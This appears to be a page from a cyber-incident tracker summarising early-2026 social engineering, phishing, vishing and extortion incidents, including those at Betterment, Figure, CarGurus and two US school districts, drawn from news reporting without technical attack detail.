At least one individual
March 18, 2026
•[ phishing, malware, social engineering ]
Cyber fraudsters in Navi Mumbai impersonated Mahanagar Gas Limited officials and sent malicious WhatsApp files or links that compromised victims' phones and enabled unauthorized access to their bank accounts.
Outpost24
March 16, 2026
•[ phishing, DKIM, social engineering ]
SecurityWeek reported that a C-level executive at Outpost24 was targeted with a sophisticated phishing attempt that used a DKIM-signed email, trusted redirection infrastructure, compromised servers, and Cloudflare-protected phishing pages. Outpost24s subsidiary Specops Software said it detected and blocked the attack early before any systems were compromised or users impacted.
At least one KakaoTalk user
March 16, 2026
•[ malware, account takeover, cyberattack ]
Yonhap/The Korea Times reported a North Korea-linked group used stolen KakaoTalk accounts to distribute malware in recent cyberattacks, highlighting a new propagation tactic. Reporting said the threat actors compromise victims, gain access to KakaoTalk desktop accounts, and then use that trusted messaging channel to push malicious payloads to selected contacts.
An undislcosed organization
March 12, 2026
•[ ransomware, social engineering, data theft ]
IBM X-Force described a case where a threat actor remained on a compromised server for more than a week and stole data during an Interlock ransomware intrusion. The attack began with ClickFix social engineering and later deployed a PowerShell backdoor called Slopoly (likely AI-assisted), alongside other components such as NodeSnake and InterlockRAT. The article is a case-study/campaign description and does not name the victim organization or quantify the affected records beyond describing persistence and data theft.
At least one Dutch government official
March 9, 2026
•[ social engineering, phishing, state-sponsored hackers ]
Dutch intelligence services warned that Russian state hackers are attempting to gain access to large numbers of Signal and WhatsApp accounts belonging to senior officials, military personnel, and civil servants worldwide. The campaign uses social engineering to trick users into revealing verification and PIN codes, including posing as a Signal support chatbot. The report notes Dutch government employees have also been targeted and, in some cases, compromised. This is campaign/advisory reporting rather than a single discrete victim event.
The City of Arab
March 9, 2026
•[ phishing, BEC, social engineering ]
GovTech reported that the City of Arab, Alabama was hit by a socially engineered phishing/BEC-style fraud in which perpetrators impersonated a legitimate officer of the contractor (FITE Construction) and induced the city to issue a fraudulent payment of $432,739.21 to an unauthorized entity. City leaders stated the fraud was detected internally and triggered a broader investigation. The report focuses on financial loss via social engineering rather than system disruption or data theft.
Undisclosed cryptocurrency organization
March 9, 2026
•[ cryptocurrency, social engineering, cloud compromise ]
The Hacker News reported (citing Google Cloud) that North Korea-linked UNC4899 conducted a sophisticated 2025 cloud compromise targeting an unnamed cryptocurrency organization, stealing millions in cryptocurrency. The intrusion began with social engineering that tricked a developer into downloading a malicious archive for a supposed open-source collaboration; the developer then transferred the file to a work device via AirDrop. After malicious Python code executed and a binary masquerading as kubectl ran, the attackers pivoted into the cloud environment and abused legitimate DevOps workflows to harvest credentials, escape container confines, and tamper with Cloud SQL databases to modify financial logic enabling theft. This is coded as a confirmed successful intrusion with financial theft.
Mercer Advisors
February 16, 2026
•[ cybersecurity breach, ransomware, data leak ]
Wealth Management reported a class action lawsuit alleging Mercer Advisors suffered a cybersecurity breach around Feb. 16, 2026 carried out by ShinyHunters. The complaint said ShinyHunters demanded ransom within 48 hours and threatened to leak roughly 5.7 million client records; after Mercer refused to pay, the group published the stolen information. The article states the leaked data includes names, Social Security numbers, and other personal information, raising risks of identity theft, fraud, and highly targeted phishing/social engineering. The report also mentions ShinyHunters targeting other wealth firms, but the primary record is the Mercer breach and alleged publication of client data.
At least one Bitcoin owner
February 15, 2026
•[ cryptocurrency, phishing, malicious javascript ]
BleepingComputer described a campaign where threat actors abused Pastebin comments to distribute a ClickFix-style attack that tricks cryptocurrency users into executing malicious JavaScript in their browser. The technique enables attackers to hijack crypto swap transactions and redirect funds to attacker-controlled wallets.
CarGurus
February 13, 2026
•[ data breach, social engineering, vishing ]
TechRadar reported that ShinyHunters claimed to have breached CarGurus and stolen about 1.7 million corporate records, threatening to release the data by a stated deadline. The report linked the claim to a broader wave of social-engineering vishing attacks used to obtain employee credentials/MFA codes and then access SSO dashboards (Okta/Entra/Google) and downstream applications. At the time of reporting in the article, CarGurus had not publicly confirmed the breach details, the precise intrusion window, or exactly what categories of data were taken beyond the actors claim, so this record reflects an alleged data-theft event pending independent confirmation.
Figure
February 12, 2026
•[ social engineering, data leak, extortion ]
Figure Technology Solutions confirmed it suffered a data breach after an employee fell victim to a social engineering attack, with attackers obtaining a limited number of files. SecurityWeek reported that the ShinyHunters group took credit and posted archive files on its leak site; Have I Been Pwned analysis identified roughly 967,000 user records in the leaked data. The exposed information includes names, dates of birth, email addresses, postal addresses, and phone numbers. The reporting frames the incident as data theft/extortion without describing service disruption to Figures lending operations.
Optimizely
February 11, 2026
•[ voice-phishing, social engineering, data leak ]
Attackers associated with the ShinyHunters cybercriminal group used a voice-phishing social engineering attack to gain access to Optimizelys internal systems and CRM environment. Approximately 10,000 client organizations were affected, with exposed data including business contact information such as names, email addresses, and phone numbers.
At least one European official
February 9, 2026
•[ social engineering, scams, QR-code device linking ]
Social engineering against Signal users using fake support scams and QR-code device linking to spy on targets.
Portland Public Schools
February 3, 2026
•[ phishing, email compromise, unauthorized access ]
A phishing email offering a fake part-time job opportunity was sent to students after a staff email account (reported as a teacher account) was compromised. Because the message originated from an internal staff account, it bypassed normal restrictions and reached many student inboxes across the district. The district technology department removed copies of the email from the school system and issued guidance for students who submitted information to the linked form. The confirmed effect is unauthorized use of an internal account to distribute phishing content; the report does not confirm broader system compromise or data exfiltration beyond what students may have submitted to the scam.
Westport Public Schools email account
February 2, 2026
•[ phishing, email hijacking, data leak ]
Student-submitted personal info via linked Google Form: name, email address, home address, date of birth, grade level, and bank name","Westport Public Schools reported that a district staff email account (identified as a Spanish teachers account) was hijacked on a Friday afternoon and then used to send a phishing email to students in grades K12 with the subject line Employment Program For Westport Public Schools. The message advertised a work-from-home employment program connected to Feed the Children and included a linked Google Form encouraging students to apply. Because the email originated from an internal staff account, it bypassed normal email restrictions and reached student inboxes across the district, including Staples High School. District officials said the technology department removed all copies of the email from the school system and began identifying students who clicked the link and may have submitted personal information; families of students who filled out the form were contacted directly and advised to monitor accounts for fraud. Officials stated no district systems were breached beyond the single compromised email account and that student school-issued accounts remained secure.
Figure
January 28, 2026
•[ social engineering, fintech, data leak ]
In February 2026, data obtained from the fintech lending platform Figure was publicly posted online. The exposed data, dating back to January 2026, contained over 900k unique email addresses along with names, phone numbers, physical addresses and dates of birth. Figure confirmed the incident and attributed it to a social engineering attack in which an employee was tricked into providing access.
Cuero Chamber of Commerce
January 26, 2026
•[ malware, social engineering, ClickFix ]
The Cuero Chamber of Commerce reported a malware/social engineering incident affecting its web properties after a customer noticed suspicious activity in an email sent January 26. The chamber said users registering for an event were shown a CAPTCHA prompt and then instructed to press Windows+R and paste/run contentbehavior consistent with ClickFix social engineering designed to trick victims into executing malicious commands on their own devices. The chamber stated that the Cuero Development Corporation website was the only confirmed security breach and that significant data loss occurred, and it believed the malware was introduced via a third-party platform (Shopify) used for event registration. The chamber said it could not determine how many people or organizations were affected and implemented additional safeguards.
Crunchbase
January 23, 2026
•[ vishing, social engineering, credential theft ]
Reporting on an Okta SSO vishing (voice-phishing) campaign, ShinyHunters reportedly confirmed to a researcher that it conducted the campaign and launched a new dark web leak site. According to the report, ShinyHunters claimed that multiple victims had their data posted after refusing extortion demands, naming Crunchbase, SoundCloud, and Betterment as initial examples. The incident reflects social-engineering-driven credential theft leading to unauthorized access and data theft, followed by extortion and publication of alleged victim data.
Choice Hotels International
January 14, 2026
•[ social engineering, unauthorized access, PII leak ]
An unauthorized person used social engineering to gain access to a Choice Hotels application containing records on franchisees and franchise applicants, exposing names and Social Security numbers.
Betterment
January 9, 2026
•[ social engineering, phishing, data leak ]
In January 2026, the automated investment platform Betterment confirmed it had suffered a data breach attributed to a social engineering attack. As part of the incident, Betterment customers received fraudulent crypto-related messages promising high returns if funds were sent to an attacker-controlled cryptocurrency wallet. The breach exposed 1.4M unique email addresses, along with names and geographic location data. A subset of records also included dates of birth, phone numbers, and physical addresses. In its disclosure notice, Betterment stated that the incident did not provide attackers with access to customer accounts and did not expose passwords or other login credentials.
